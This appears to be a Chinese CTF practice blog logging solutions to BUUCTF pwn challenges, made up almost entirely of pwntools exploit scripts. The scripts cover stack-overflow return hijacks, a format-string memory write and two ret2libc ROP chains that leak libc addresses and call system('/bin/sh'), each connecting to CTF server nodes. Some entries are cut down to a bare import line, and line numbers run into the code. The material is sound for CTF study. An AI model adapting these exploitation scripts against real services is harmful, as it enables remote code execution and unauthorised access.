pwn_浅学一下
buuctf刷题记录:
rip
简单的栈溢出: 1
2
3
4
5
6
7from pwn import*
# r=remote('node3.buuoj.cn',29386)
r = process('./pwn1')
shell_addr=0x401186
payload=b'a'*(0xF+8)+p64(shell_addr + 1)
r.sendline(payload)
r.interactive()1
2
3
4
5
6
7from pwn import *
r = remote('node5.buuoj.cn', 29716)
# r = process('./warmup_csaw_2016')
addr = 0x40060d
payload = b'a' * (64 + 8) + p64(addr + 1)
r.sendline(payload)
r.interactive()
ciscn_2019_c_1
还是栈溢出: 1
2
3
4
5
6from pwn import *
r = remote('node5.buuoj.cn', 28905)
# r = process('./ciscn_2019_n_1')
payload = b'a' * (0x30 - 0x4) + p64(0x41348000)
r.sendline(payload)
r.interactive()
pwn1_sctf_2016
1 | from pwn import * |
jarvisoj_level0
1 | from pwn import * |
[第五空间2019 决赛]PWN5
格式化字符串:(有空写写) 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16from pwn import*
r=remote('node5.buuoj.cn',29205)
# r = process('./pwn')
# r = gdb.debug('./pwn', """
# b *0x080492EF
# cl
# """)
payload=p32(0x804c044)+p32(0x804c045)+p32(0x804c046)+p32(0x804c047)
payload+=(b'%223c%10$n'
b'%222c%11$hhn'
b'%222c%12$hhn'
b'%85c%13$hhn')
r.sendline(payload)
r.sendline(str(0xabcdef))
r.interactive()
jarvisoj_level2
1 | from pwn import * |
本地没问题,远程出bug,感受到了神奇的魔法波动~
[NewStarCTF 公开赛赛道]ret2libc
ret2libc的题,也是以后得找个机会写一下 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34from pwn import *
from LibcSearcher import *
# r = process('./ret2libcpwn')
r = remote('node5.buuoj.cn', 25091)
elf = ELF('./ret2libcpwn')
main = 0x400698
pop_rdi = 0x400753
ret = 0x40050e
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
payload = b'a' * (0x20 + 8)
payload += p64(pop_rdi)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(main)
r.sendlineafter(b'Glad to meet you again!What u bring to me this time?\n', payload)
data = r.recvuntil(b'\n')
print("Received raw data:", data)
puts_addr = u64(r.recvline()[:-1].ljust(8,b'\0'))
print("puts_addr ====>", hex(puts_addr))
libc=LibcSearcher('puts',puts_addr)
offset=puts_addr-libc.dump('puts')
binsh=offset+libc.dump('str_bin_sh')
system=offset+libc.dump('system')
payload = b'a' * (0x20 + 8)
payload += p64(ret)
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(system)
r.sendlineafter(b'Glad to meet you again!What u bring to me this time?\n', payload)
r.interactive()
[NewStarCTF 2023 公开赛道]ret2libc
和上一道几乎一模一样 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43from pwn import *
from LibcSearcher import *
r = remote('node5.buuoj.cn',25667)
# r = process('./newstarCTFret2libc')
elf = ELF('./newstarCTFret2libc')
main = 0x400698
pop_rdi = 0x400763
ret = 0x400506
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
payload = b'a' * (0x20 + 8) # 全部改为字节
payload += p64(pop_rdi)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(main)
r.sendlineafter(b'Show me your magic again', payload) # 分隔符改为字节
data = r.recvuntil(b"\n")
print("Received raw data:", data)
data2 = r.recvuntil(b"\n")
print("Received raw data2:", data2)
puts_addr = u64(r.recvline()[:-1].ljust(8,b'\0'))
print(hex(puts_addr))
libc=LibcSearcher('puts',puts_addr)
offset=puts_addr-libc.dump('puts')
binsh=offset+libc.dump('str_bin_sh')
system=offset+libc.dump('system')
payload=b'a'*(0x20+8)
payload+=p64(ret)
payload+=p64(pop_rdi)
payload+=p64(binsh)
payload+=p64(system)
r.sendlineafter(b'Show me your magic again', payload) # 分隔符改为字节
r.interactive()
ciscn_2019_c_1
1 | from pwn import * |
